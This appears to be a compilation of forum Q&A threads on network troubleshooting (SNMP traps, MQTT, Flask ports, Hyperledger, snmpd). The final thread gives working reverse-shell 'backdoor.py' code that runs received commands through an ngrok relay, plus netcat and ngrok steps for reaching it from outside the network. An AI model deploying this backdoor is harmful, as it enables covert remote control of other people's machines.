pysnmp not able to receive trap from different machine - python-2.7

Instead of the localhost IP, I use my VM's IP (eth0, 192.168.12.20) to receive trap notifications. I do not receive any traps if I generate one from outside the VM (using the snmptrap command from another machine), but I can see the SNMP data when I run tcpdump on the VM's eth0 interface.
If I generate a trap from the same machine using the snmptrap command, I can see the trap data via the pysnmp trap receiver script.
Options tried:
1. Binding the port to 0.0.0.0 to receive traps from any machine.
2. Enabling the debugging option in pysnmp to get some idea of how to solve the issue. No debug output is generated when the snmptrap is sent from the outside machine.
The closest scenario to my question is described in the following link, which does not have a final solution.
Code:
SNMP v1 and v2c:
from pysnmp.carrier.asynsock.dispatch import AsynsockDispatcher
from pysnmp.carrier.asynsock.dgram import udp, udp6
from pyasn1.codec.ber import decoder
from pysnmp.proto import api
from pysnmp.entity import engine, config
from pysnmp.entity.rfc3413 import ntfrcv
from pysnmp import debug

debug.setLogger(debug.Debug("all"))

### SNMPv2c/SNMPv1 setup

### Callback function for receiving notifications
def v2cv1CallBackFunc(snmpEngine, stateReference, contextEngineId, contextName,
                      varBinds, cbCtx):
    transportDomain, transportAddress = snmpEngine.msgAndPduDsp.getTransportInfo(stateReference)
    print transportDomain, transportAddress
    # Get an execution context...
    execContext = snmpEngine.observer.getExecutionContext(
        'rfc3412.receiveMessage:request'
    )
    # ... and use inner SNMP engine data to figure out peer address
    print('Notification from %s, ContextEngineId "%s", ContextName "%s"'
          % ('#'.join([str(x) for x in execContext['transportAddress']]),
             contextEngineId.prettyPrint(), contextName.prettyPrint()))
    for name, val in varBinds:
        print('%s = %s' % (name.prettyPrint(), val.prettyPrint()))

# Create SNMP engine with autogenerated engineID, pre-bound
# to the socket transport dispatcher
snmpEngine = engine.SnmpEngine()

# SNMPv1/2c setup
# SecurityName <-> CommunityName mapping
config.addV1System(snmpEngine, 'my-area', 'public')

# Specify security settings per SecurityName (SNMPv2c -> 1)
config.addTargetParams(snmpEngine, 'my-creds', 'my-area', 'noAuthNoPriv', 1)

# Transport setup
# UDP over IPv4, first listening interface/port
config.addSocketTransport(
    snmpEngine,
    udp.domainName + (1,),
    udp.UdpSocketTransport().openServerMode(('0.0.0.0', 162))
)

# Register SNMP Application at the SNMP engine
ntfrcv.NotificationReceiver(snmpEngine, v2cv1CallBackFunc)

snmpEngine.transportDispatcher.jobStarted(1)  # this job would never finish

# Run I/O dispatcher which would receive queries and send confirmations
try:
    snmpEngine.transportDispatcher.runDispatcher()
except:
    snmpEngine.transportDispatcher.closeDispatcher()
    raise
Thanks in advance

I found the issue with help from my IT team. The API itself works perfectly; the firewalld service was not allowing the packets through. After I added the SNMP ports to the firewall exception list, my code worked.
Commands I used:
sudo firewall-cmd --add-port=161-162/udp --zone=public --permanent
sudo systemctl restart network
sudo systemctl reload firewalld
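If traps still fail to arrive after opening the firewall, a bare UDP listener can separate a network/firewall problem from a pysnmp problem. Here is a minimal sketch of that idea (the script and filename are mine, not part of the original answer); it binds the same address and port as the receiver:

# udp_check.py - hypothetical helper: confirm datagrams reach UDP port 162 at all
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', 162))  # same bind as the pysnmp receiver; needs root for ports < 1024
print 'waiting for a datagram on UDP port 162...'
data, peer = sock.recvfrom(4096)  # blocks until the remote snmptrap arrives
print 'received %d bytes from %s' % (len(data), peer[0])

If this script prints the datagram while the pysnmp receiver stays silent, the problem is in the receiver configuration rather than in the network.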

Related

How to connect to Mosquitto MQTT Broker, that is running on a Google Cloud Virtual Machine Instance, using mqtt.js

What I am trying to achieve: I have a Mosquitto MQTT broker running on a Google Cloud virtual machine (Ubuntu), and I want to be able to connect to it from my local PC using mqtt.js.
My setup
I have created a VM instance in Google Cloud, running Ubuntu 20.04 LTS.
Some of the settings:
Firewall – allow HTTPS and allow HTTP
Firewall rule – opens port 1883
I installed the Mosquitto MQTT broker (version 1.6.9) on this VM.
I was able to verify the installation and that it was running by opening two SSH terminals, one to publish, one to subscribe:
mosquitto_sub -t test
mosquitto_pub -t test -m "hello"
Then I read that when I want to connect to VMs using third-party tools, I must create and upload my own SSH keys to VMs:
ssh-keygen -t rsa -f C:\keys\VM_KEYFILE -b 2048 pwd: ****
I got two files now, the private and public keys:
VM_KEYFILE
VM_KEYFILE.pub
I then used icacls to modify the private key's permissions:
icacls.exe VM_KEYFILE /reset
icacls.exe VM_KEYFILE /grant:r "$($env:username):(r)"
icacls.exe VM_KEYFILE /inheritance:r
I then successfully connected to the VM from a Windows console:
ssh -i "VM_KEYFILE" username@vm_public_ip_address
So now I want to try to connect using Node.js.
I already have a JavaScript file that uses mqtt.js to connect to some of the public MQTT brokers, e.g. HiveMQ.
Some of its settings are:
let broker_host = 'broker.hivemq.com';
let broker_port = 1883;
let client_id = 'my_client_1';
const connection_options = {
    port: broker_port,
    host: broker_host,
    clientId: client_id,
    clean: true,
    keepalive: false
};
My question: how would I modify this JavaScript file to connect to the MQTT broker that is running in the Google Cloud VM?
There is no username/password/authentication set up for the broker itself, just for the VM.
I tried something like this, but I have no idea how to use the SSH key:
let broker_host_gcm_vm = 'https://<vm_public_ip_address>';
UPDATE
I can connect to the broker from both (a) MQTT Explorer and (b) the MQTTX desktop app.
All I have to enter for the connection details is:
Host: mqtt://<ip address>
Port: 1883
Then I can publish / subscribe successfully.
I tried changing my JavaScript connection to the following, but I still can't connect from here:
let broker_host_gcm_vm1 = 'mqtt://<ip address>';
I found the problem.
Let's say the host IP address is 11.22.33.44
The host was none of these:
let broker_host = 'http://11.22.33.44';
let broker_host = 'https://11.22.33.44';
let broker_host = 'mqtt://11.22.33.44';
let broker_host = 'mqtts://11.22.33.44';
But was simply this:
let broker_host = '11.22.33.44';
Simple when you know how :)
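To sanity-check the same conclusion outside mqtt.js, the plain-IP connection can be tested from Python with the paho-mqtt package (my own sketch, not part of the original answer; install with pip install paho-mqtt):

import paho.mqtt.client as mqtt

# plain host string, no scheme prefix - the same fix the answer arrives at
client = mqtt.Client(client_id='my_client_1')
client.connect('11.22.33.44', 1883, keepalive=60)
client.loop_start()
client.publish('test', 'hello')

If this publishes successfully, the broker and firewall rule are fine and only the client-side host string needs fixing.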

localhost / 127.0.0.1 took too long to respond - Attempting to run Flask App

I am trying to run a Flask app locally and I am running into "connection to localhost refused" issues. My app's directory structure looks something like this:
Directory
- index.py
- app.py
- auth
  -- __init__.py
Contents of `__init__.py`:
from flask import Flask, redirect
from werkzeug.middleware.dispatcher import DispatcherMiddleware
from werkzeug.serving import run_simple
from index import application as dashApp

@server_auth.route('/dashboard')
@login_required
def dashboard():
    return redirect('/dashboard')

app = DispatcherMiddleware(server_auth,
                           {'/dashboard': dashApp.server})

# Change to port 80 to match the instance for AWS EB Environment
if __name__ == '__main__':
    run_simple('0.0.0.0', 80, app, use_reloader=True, use_debugger=True)
I launch the app using the `gunicorn auth:app` command.
[2022-02-11 20:57:24 -0800] [2273] [INFO] Starting gunicorn 20.1.0
[2022-02-11 20:57:24 -0800] [2273] [INFO] Listening at: http://127.0.0.1:8000 (2273)
[2022-02-11 20:57:24 -0800] [2273] [INFO] Using worker: sync
[2022-02-11 20:57:24 -0800] [2274] [INFO] Booting worker with pid: 2274
I have tried a few things to troubleshoot the issue.
netstat -avn | grep 8000
tcp4 0 0 127.0.0.1.8000 *.* LISTEN 131072 131072 2273 0 0x0100 0x00000006
Turned off the firewall, flushed the DNS cache, and cleared the browser cache, as mentioned in this link:
https://www.hostinger.com/tutorials/localhost-refused-to-connect-error
With the limited info given, I suggest you try a few other things:
1. Create a simple GET API for / (without any decorator) and try to hit it, with a breakpoint() in the code to check.
2. Instead of gunicorn, first try to run with the normal development server:
python __init__.py
If the other answer by @Vismay doesn't work, try changing your port from 80 to 8080. Since you didn't provide minimal info, port 80 might be in use by another service.
Could you run lsof -i:80 and lsof -i:8000 to determine whether those ports are in use?
Maybe your problem is related to "# Change to port 80 to match the instance for AWS EB Environment". Assuming that you're trying to run it locally, consider that on Linux you need root to run on port 80 (i.e. use sudo to run your server), while on Windows ports under 1024 are usually considered privileged and need a similar workaround. How to fix it? Try using a different port for your Flask app (say, 5000), as in the sketch after the quote below.
In any case, it seems that Elastic Beanstalk only uses port 80 for inbound traffic (connections with other instances), so maybe you should try a different port. For example, in this part of the EB docs they just use port 8000. This seems to be the same conclusion reached in another SO question, Running Flask port 80 on Elastic-Beanstalk Worker:
The ELB worker is connected to an SQS queue, by a daemon that listens to that queue, and (internally) posts any messages to http://localhost:80. Apache is listening on port 80. (...) So the solution I found is to change which port the local daemon posts to - by reconfiguring it via a YAML config file, it will post to port 5001, where my Flask app was running. This means Apache can continue to handle the health-checks on port 80, and Flask can handle the SQS messages from the daemon.
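Concretely, the "use a different port" suggestion amounts to a one-line change in the __main__ block. A minimal sketch, assuming the same DispatcherMiddleware `app` object from the question's `__init__.py`:

from werkzeug.serving import run_simple

if __name__ == '__main__':
    # port 5000 is unprivileged, so no root/sudo is needed locally
    run_simple('0.0.0.0', 5000, app, use_reloader=True, use_debugger=True)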

docker exec cli peer channel create | failed to create new connection: context deadline exceeded | amazon managed blockchain

I am trying to set up a Hyperledger Fabric blockchain network using Amazon Managed Blockchain, following this guide. In step 6, to create the channel, I executed the following command:
docker exec cli peer channel create -c hrschannel -f /opt/home/hrschannel.pb -o orderer.n-zzzz.managedblockchain.us-east-1.amazonaws.com:30001 --cafile /opt/home/managedblockchain-tls-chain.pem --tls
But I am getting the following error:
Error: failed to create deliver client: orderer client failed to connect to orderer.n-zzzz.managedblockchain.us-east-1.amazonaws.com:30001: failed to create new connection: context deadline exceeded
Help me to fix this issue.
Edited:
I asked the same question on Reddit. One user replied that he added a listenAddress environment variable in his configtx.yaml file, but he did not give clear information about which listenAddress to use or where to add it in configtx.yaml. Here is my configtx.yaml file:
################################################################################
#
#   Section: Organizations
#
#   - This section defines the different organizational identities which will
#     be referenced later in the configuration.
#
################################################################################
Organizations:
    - &Org1
        # DefaultOrg defines the organization which is used in the sampleconfig
        # of the fabric.git development environment
        Name: m-CUB6HI
        # ID to load the MSP definition as
        ID: m-B6HI
        MSPDir: /opt/home/admin-msp
        # AnchorPeers defines the location of peers which can be used
        # for cross org gossip communication. Note, this value is only
        # encoded in the genesis block in the Application section context
        AnchorPeers:
            - Host:
              Port:

################################################################################
#
#   SECTION: Application
#
#   - This section defines the values to encode into a config transaction or
#     genesis block for application related parameters
#
################################################################################
Application: &ApplicationDefaults
    # Organizations is the list of orgs which are defined as participants on
    # the application side of the network
    Organizations:

################################################################################
#
#   Profile
#
#   - Different configuration profiles may be encoded here to be specified
#     as parameters to the configtxgen tool
#
################################################################################
Profiles:
    OneOrgChannel:
        Consortium: AWSSystemConsortium
        Application:
            <<: *ApplicationDefaults
            Organizations:
                - *Org1
One must check whether the peer container is able to communicate with the orderer container. curl <orderer-endpoint>:<port> can be used to check the connection. If the peer is unable to communicate, then either the orderer container is down or the two containers are in different security groups.
Update:
As the OP mentioned in the comments, changing the port helped resolve the issue. One must give that a try.
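A raw TCP check of the same endpoint can also be sketched in Python (reusing the placeholder orderer endpoint from the question); if even this connection times out, the problem is in the network path or security groups rather than in Fabric or TLS:

import socket

# placeholder endpoint from the question; substitute your orderer's address
orderer = ('orderer.n-zzzz.managedblockchain.us-east-1.amazonaws.com', 30001)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)  # fail fast, mirroring the gRPC "context deadline exceeded"
try:
    sock.connect(orderer)
    print('TCP connection to the orderer succeeded')
except socket.error as exc:
    print('TCP connection failed: %s' % exc)
finally:
    sock.close()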

snmpd pass to run python

I'm trying to query a Modbus device through SNMP, using snmpd's pass directive to run a Python script that retrieves the data.
#!/bin/bash
# snmpd "pass" handler: for a GET (-g), print the OID, the type, then the value
if [ "$1" = "-g" ]
then
    echo .1.3.6.1.4.1.52612.10.3.1
    echo string
    python /usr/local/bin/readvolt.py
fi
exit 0
And this is what readvolt.py looks like:
#!/usr/bin/python
import minimalmodbus

eqp = minimalmodbus.Instrument('/dev/ttyUSB0', 1)  # port name, slave address (in decimal)
# skip some other lines for serial port initialization
volt = eqp.read_float(0, 4, 2)  # getting data from serial modbus
print volt
And this is the line from my snmpd.conf:
pass .1.3.6.1.4.1.52612.10.3.1 /bin/sh /usr/local/bin/volt.sh
My question: I get a traceback from Python saying it could not find the minimalmodbus module, but when I run readvolt.py directly on the host, it works as expected (it prints out the voltage):
pi@raspberrypi:/usr/local/bin $ readvolt.py
220.25
I also tried a simple Python script (test.py), just to make sure that snmpd's pass can run a Python script in response to an snmpget from the SNMP manager:
#!/usr/bin/python
import sys
print "test"
It ran OK:
suryo@r50e:~$ snmpwalk -v2c -c public 192.168.1.5 .1.3.6.1.4.1.52612.10.3.1
iso.3.6.1.4.1.52612.10.3.1 = STRING: "test"
suryo@r50e:~$
What is the problem here? It seems that Python cannot import the external module when it is run via snmpd's pass. I'm wondering if this is an access control issue: Debian-snmp doesn't have the right to access the serial port.
The problem is solved, by finding out the username the snmpd daemon runs as. I put whoami in the script and got 'Debian-snmp'; from there it became straightforward. I checked group membership by running:
pi@raspberrypi:~ $ groups Debian-snmp
Debian-snmp : Debian-snmp
Adding Debian-snmp to the dialout group grants it access to the serial ports:
pi@raspberrypi:~ $ sudo usermod -a -G dialout Debian-snmp
Restart snmpd so it logs on with the new membership, and voilà: it can read the slave Modbus device via snmpget.
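The same diagnostic can be done from inside the Python script itself. This is my own sketch (the filename is made up), useful because it shows both the effective user and its supplementary groups in one shot:

# whoami_check.py - hypothetical diagnostic; run it via the snmpd pass hook
import os
import pwd
import grp

user = pwd.getpwuid(os.getuid()).pw_name
groups = [g.gr_name for g in grp.getgrall() if user in g.gr_mem]
print user, groups  # before the fix: 'Debian-snmp' without 'dialout'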

reverse shell port forwarding

I created a reverse shell with Python, and I have a problem with port forwarding on my router.
I don't have a static IP.
In the router:
Protocol: TCP
Local IP addr: 192.168.1.10
Local port: 8090
WAN IP addr: ---
WAN port: 8090
State: enabled
In my Python script I can't bind to my WAN IP address:
ST.bind((Wanipaddr, 8090))
If I bind to the local IP address, my reverse shell client can't connect to the server.
What's the solution to my problem?
Thanks
If you want to use your backdoor to receive connections from outside the LAN, use ngrok.
Example:
1. Listen on port 4444:
nc -lp 4444
2. After ngrok is installed, run this command:
ngrok tcp 4444
3. Now find the ngrok forwarding address in the ngrok console output.
4. Use your ngrok address for the client to connect:
# backdoor.py
import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = '0.tcp.ngrok.io'
PORT = 12969
s.connect((HOST, PORT))

while True:
    conn = s.recv(2048).decode()
    if conn[:3] == 'cd ':
        os.chdir(conn[3:])
        cmd = b''  # bytes, so the getcwd() suffix below can be appended
    else:
        proc = subprocess.Popen(conn, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                stdin=subprocess.DEVNULL, shell=True)
        stdout, stderr = proc.communicate()
        cmd = stdout + stderr
    cmd += ('\n' + os.getcwd()).encode()
    s.send(cmd)
5. Now you can receive connections from anyone outside your network.
It sounds like your router is configured to forward requests from the internet on port 8090 to your host (assuming you have the correct LAN IP). Perhaps just try binding to 0.0.0.0.
From Wikipedia, this fits the context:
A way to specify "any IPv4 address at all". It is used in this way when configuring servers (i.e. when binding listening sockets).
In other words, you're telling your server to listen on every available network interface (on that port).
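As a sketch of that suggestion (reusing the question's ST socket name; the port comes from the router rule above):

import socket

ST = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ST.bind(('0.0.0.0', 8090))  # all interfaces; the router forwards WAN:8090 here
ST.listen(1)
conn, addr = ST.accept()  # the reverse shell client connects to the WAN IP
print('connection from %s:%d' % addr)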